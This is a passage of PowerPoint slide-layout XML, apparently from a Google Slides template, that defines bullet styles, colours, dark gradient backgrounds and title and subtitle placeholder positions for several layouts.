              <a:buSzPts val="800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-279400" lvl="1" marL="914400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-279400" lvl="2" marL="1371600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="■"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-279400" lvl="3" marL="1828800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-279400" lvl="4" marL="2286000" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-279400" lvl="5" marL="2743200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="■"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-279400" lvl="6" marL="3200400" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="●"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-279400" lvl="7" marL="3657600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="○"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr indent="-279400" lvl="8" marL="4114800" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="1EFFC1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buChar char="■"/>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="1EFFC1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Google Shape;95;p16"/>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61234"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Roboto Black"/>
              <a:buNone/>
              <a:defRPr b="0" sz="300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solidFill>
          <a:srgbClr val="FFFFFF"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="96" name="Shape 9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TITLE_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:grad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13" name="Google Shape;13;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411225" y="212190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4" name="Google Shape;14;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167125" y="1901250"/>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5" name="Google Shape;15;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411225" y="304660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6" name="Google Shape;16;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167125" y="2797975"/>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7" name="Google Shape;17;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6411225" y="393545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8" name="Google Shape;18;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167125" y="3694700"/>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9" name="Google Shape;19;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725750" y="212190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0" name="Google Shape;20;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827575" y="190125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1" name="Google Shape;21;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="9" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725750" y="304660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2" name="Google Shape;22;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="13" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827575" y="279797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3" name="Google Shape;23;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="14" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="725750" y="393545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4" name="Google Shape;24;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827575" y="369470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5" name="Google Shape;25;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643488" y="2050763"/>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6" name="Google Shape;26;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="17" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643488" y="2974963"/>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7" name="Google Shape;27;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="18" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643488" y="3863900"/>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8" name="Google Shape;28;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="19" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="20507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9" name="Google Shape;29;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="20" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="29749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0" name="Google Shape;30;p3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="21" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6424513" y="3863900"/>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 IMAGE">
  <p:cSld name="TITLE_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:grad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600"/>
              <a:buFont typeface="Roboto Black"/>
              <a:buNone/>
              <a:defRPr b="0" sz="36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33" name="Google Shape;33;p4"/>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TITLE_1_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="34" name="Shape 34"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Google Shape;35;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819931"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6" name="Google Shape;36;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434656"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7" name="Google Shape;37;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3633931"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8" name="Google Shape;38;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="726631"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9" name="Google Shape;39;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6341356"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40" name="Google Shape;40;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3540631"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41" name="Google Shape;41;p5"/>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2_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="42"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txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2770350" y="1558300"/>
            <a:ext cx="3530400" cy="19401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E2A47"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2806800" y="1757550"/>
            <a:ext cx="3457500" cy="142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E2A47"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0E2A47"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="0E2A47"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2"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TITLE_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="46" name="Shape 46"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Google Shape;47;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557931" y="206401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48" name="Google Shape;48;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557931" y="3466700"/>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49" name="Google Shape;49;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1557931" y="2765356"/>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0" name="Google Shape;50;p7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="998325" y="644550"/>
            <a:ext cx="7833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p:cSld name="TITLE_1_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="51" name="Shape 51"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Google Shape;52;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393881" y="2071888"/>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3" name="Google Shape;53;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393881" y="3474575"/>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4" name="Google Shape;54;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5393881" y="2773231"/>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5" name="Google Shape;55;p8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="256200" y="637927"/>
            <a:ext cx="7833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5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="5200"/>
              <a:buNone/>
              <a:defRPr sz="5200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="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INFOGRAPHY">
  <p:cSld name="TITLE_1_1_2">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="56" name="Shape 56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3874950" y="362507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58" name="Google Shape;58;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5813500" y="3639800"/>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59" name="Google Shape;59;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1936387" y="36197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60" name="Google Shape;60;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3533994" y="35033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1" name="Google Shape;61;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5472556" y="35234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2" name="Google Shape;62;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1595444" y="35033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3" name="Google Shape;63;p9"/>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p:cSld name="TITLE_1_1_2_1">
    <p:bg>
      <p:bgPr>
        <a:gradFill>
          <a:gsLst>
            <a:gs pos="0">
              <a:srgbClr val="052643"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="041523"/>
            </a:gs>
          </a:gsLst>
          <a:path path="circle">
            <a:fillToRect b="50%" l="50%" r="50%" t="50%"/>
          </a:path>
          <a:tileRect/>
        </a:gradFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
